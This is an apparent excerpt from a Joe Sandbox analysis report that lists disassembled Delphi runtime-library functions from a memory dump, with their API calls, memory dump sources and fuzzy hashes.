                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$Stringx20$Sysutils@$Cat$qqrr20$From$Asg$qqrr20Comp$qqrpxbt1uiLocaleStringi$AnsiCharEnsureLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Char$qqrr20Clr$qqrpvCopy$qqrx20Def$qqrx20InfoInternalLen$qqrr20Length$qqrr20Length$qqrx20Long$qqrx20Move$qqrpxvpviStr$qqriix20StringbStringiiStringpbiStringriThread
                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                  • API String ID: 1621705807-1253427255
                                                                                                  • Opcode ID: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                  • Instruction ID: 4996f8794606f03fae622fcb1ff33eb4fce06e18e571e892f00786f695fe8f9d
                                                                                                  • Opcode Fuzzy Hash: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                  • Instruction Fuzzy Hash: 6A51C234A021CBCBDB10DBE8E9925EEB3A5EF91300F644363A500D7362DB74EE159791
                                                                                                  Function 5002E9E8 Relevance: 49.1, APIs: 25, Strings: 3, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@FreeAndNil$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA0A
                                                                                                    • Part of subcall function 5002B124: @System@TObject@Free$qqrv.RTL120(5002EA0F,00000000,5002EB85), ref: 5002B12C
                                                                                                  • @Sysutils@TEncoding@FreeEncodings$qqrv.RTL120(00000000,5002EB85), ref: 5002EA14
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                  • @System@RemoveModuleUnloadProc$qqrpqqrui$v.RTL120(00000000,5002EB85), ref: 5002EA1E
                                                                                                    • Part of subcall function 5000C94C: @System@@FreeMem$qqrpv.RTL120(?,?,?,?,5000C929), ref: 5000C976
                                                                                                    • Part of subcall function 5002B720: @System@@Dispose$qqrpvt1.RTL120(?,5002EA28,00000000,5002EB85), ref: 5002B73C
                                                                                                    • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DBC,00000000), ref: 500274E1
                                                                                                    • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DC0,00000000), ref: 500274F3
                                                                                                    • Part of subcall function 50027254: @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                    • Part of subcall function 50027254: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                    • Part of subcall function 50027254: @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA46
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA50
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAB5
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EACA
                                                                                                    • Part of subcall function 5000AF28: @System@@LStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF7A
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EADF
                                                                                                    • Part of subcall function 5000AF28: @System@@LStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF86
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAF4
                                                                                                    • Part of subcall function 5000AF28: @System@@WStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF97
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB09
                                                                                                    • Part of subcall function 5000AF28: @System@@WStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AFA3
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB19
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB29
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB48
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB5D
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Array$qqrpvt1uiFinalize$Free$qqrvObject@$Free$ArrayClr$qqrpvExcept$Mem$qqrpvObject$qqrv$Clear$qqrrpvpvClr$qqrpviExchangeInterlockedSysutils@$Addr$qqrvClassClass$qqrp14Dispose$qqrpvt1Encoding@Encodings$qqrvMetaModuleNil$qqrpvObjectp17Proc$qqrpqqrui$vRemoveStringUnload
                                                                                                  • String ID: ,lP$XlP$kP
                                                                                                  • API String ID: 2770033941-639665064
                                                                                                  • Opcode ID: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                  • Instruction ID: 458439708314837829a00875a32db1e9822d01f5b0deb47506a78c5581f45b3e
                                                                                                  • Opcode Fuzzy Hash: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                  • Instruction Fuzzy Hash: 3431F0203570C147F714ABE8F82266A3221DFA1751FD08B27F1009B792CA29DD4297E2
                                                                                                  Function 50030A88 Relevance: 48.2, APIs: 32, Instructions: 152windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B29
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B38
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B3D
                                                                                                  • @Variants@VarInvalidOp$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B47
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C6F
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C8C
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C9B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030CA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSysutils@$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Unicode$ErrorInvalidMessage$qqruiOp$qqrvRecxiStringpx14Variants@
                                                                                                  • String ID:
                                                                                                  • API String ID: 770543886-0
                                                                                                  • Opcode ID: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                  • Instruction ID: f96400911d13d964e0fb64cf20edc1743dca0574da95ff12fd542a95d4d1681a
                                                                                                  • Opcode Fuzzy Hash: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                  • Instruction Fuzzy Hash: B15183345035C9CFEF21DBE4EDA29EEB3B1AF24204F504326F90097666CB75AD059BA1
                                                                                                  Function 5002A000 Relevance: 44.1, APIs: 23, Strings: 2, Instructions: 309COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 50029E40: FindResourceW.KERNEL32(?,PACKAGEINFO,0000000A), ref: 50029E56
                                                                                                    • Part of subcall function 50029E40: LoadResource.KERNEL32(?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E61
                                                                                                    • Part of subcall function 50029E40: LockResource.KERNEL32(00000000,00000000,50029EA0,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E81
                                                                                                    • Part of subcall function 50029E40: FreeResource.KERNEL32(00000000,50029EA7,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E9A
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A3C8), ref: 5002A0CB
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A3C8), ref: 5002A0D6
                                                                                                  • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,5002A3C8), ref: 5002A0E3
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002A3C8), ref: 5002A0F3
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,5002A3C8), ref: 5002A121
                                                                                                  • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,00000000,5002A3C8), ref: 5002A131
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5002A3C8), ref: 5002A139
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,5002A3C8), ref: 5002A13F
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(00000000,00000000,5002A3C8), ref: 5002A14D
                                                                                                  • @System@@New$qqripv.RTL120(00000000,5002A3C8), ref: 5002A17A
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002A3C8), ref: 5002A1B6
                                                                                                  • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1C6
                                                                                                  • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1E1
                                                                                                    • Part of subcall function 50029CF0: @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                    • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                    • Part of subcall function 50029CF0: @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                    • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                    • Part of subcall function 50029CF0: CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                    • Part of subcall function 50029CF0: @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                  • @Sysutils@StrIComp$qqrpxct1.RTL120 ref: 5002A201
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A27E
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A29B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2C7
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2CC
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120 ref: 5002A37E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5002A3CF), ref: 5002A3BA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Sysutils@$Unicode$String$CharResource$File$AnsiByteChangeExt$qqrx20FreeFromHashLen$qqrpxcModuleMultiName$qqrpcString$qqrpxcxiStringt1System@%Wide$ArrayBuffChar$qqrx20Clr$qqrpvComp$qqrpxct1Except$qqrvException@$bctr$qqrp20ExtractFindHandleLen$qqrpcLength$qqrvLoadLockMem$qqriMem$qqrpvName$qqruiName$qqrx20New$qqripvRaiseRecpx14RecxiStr$qqrr20Str$qqrr27StringusStringx27T$us$i0$%T$us$i0$%x20Upper
                                                                                                  • String ID: .bpl$SysInit
                                                                                                  • API String ID: 832494849-1949293470
                                                                                                  • Opcode ID: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                  • Instruction ID: 837392768b698e741bc70171f0b158cd4f4db25f9bd6245715707dd2a9ab8d4f
                                                                                                  • Opcode Fuzzy Hash: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                  • Instruction Fuzzy Hash: 88D13C74E0129A9FDB10CF98D880ADEB7F5FF59304F10866AE554AB351DB30AE45CB90
                                                                                                  Function 500248EC Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 263timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                  • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50024C6D), ref: 500249B4
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50024C6D), ref: 50024AC1
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,00000000,50024C6D), ref: 50024AFA
                                                                                                    • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                  • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50024C6D), ref: 50024B5C
                                                                                                  • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50024C6D), ref: 50024C3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@Sysutils@$Ansi$CurrentFromPos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%TimeYear$qqrv$Copy$qqrx20DateDate$qqrusususr16EncodeEnsureInternalLen$qqrx20LocalString$qqrr20StringiiTrim$qqrx20
                                                                                                  • String ID: ddd
                                                                                                  • API String ID: 267030927-4224823564
                                                                                                  • Opcode ID: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                  • Instruction ID: 1069cb2eb66a71ff8ce87d181cf04f1ba4992945fcbd8b3ac5469d60a7480345
                                                                                                  • Opcode Fuzzy Hash: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                  • Instruction Fuzzy Hash: 52A19034E0219A8ADB40DFE9E8506FEB7F4AF19300F50426AEC44E7251D774DE85CBA6
                                                                                                  Function 5001CC54 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 249shareCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CFA9), ref: 5001CC90
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000001,?,00000400,00000000,5001CFA9), ref: 5001CCBE
                                                                                                  • WNetGetUniversalNameW.MPR(00000000,00000001,?,00000400,00000000,5001CFA9), ref: 5001CCC4
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000001,?,00000400,00000000,5001CFA9), ref: 5001CCDC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CCFE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CD48
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CD7C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CDA9
                                                                                                  • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 5001CDCA
                                                                                                  • @System@@GetMem$qqri.RTL120(00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CDEF
                                                                                                  • WNetEnumResourceW.MPR(?,FFFFFFFF,?,?), ref: 5001CE22
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,FFFFFFFF,?,?), ref: 5001CE3F
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CF5E,?,00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CE4C
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CE51
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5001CECF
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?), ref: 5001CF03
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?), ref: 5001CF18
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?), ref: 5001CF27
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(?), ref: 5001CF2C
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120 ref: 5001CF31
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@Unicode$FromString$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Exit$qqrvFinally$Char$qqrr20EnumStringpbStringx20$Asg$qqrr20Cat3$qqrr20Char$qqrx20Copy$qqrx20Mem$qqriMem$qqrrpviNameOpenReallocResourceStringiiStringt2Universal
                                                                                                  • String ID: Z
                                                                                                  • API String ID: 1098235404-1505515367
                                                                                                  • Opcode ID: ce88e6d188f896e37c4bd4105249160936e441a3b514efbdf87da04b86b1681a
                                                                                                  • Instruction ID: 71e5e890997e1f0220871d1c903543e3dfefbe9867c7c1a26dfae42662089f1d
                                                                                                  • Opcode Fuzzy Hash: ce88e6d188f896e37c4bd4105249160936e441a3b514efbdf87da04b86b1681a
                                                                                                  • Instruction Fuzzy Hash: 4BA15970A00289DBDB11DFA8DD41AEEB7F5FF09310F5042AAEA00A7251D774DE81DB95
                                                                                                  Function 5002F51C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 5002F525
                                                                                                    • Part of subcall function 5002F4F0: GetProcAddress.KERNEL32(00000000), ref: 5002F509
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
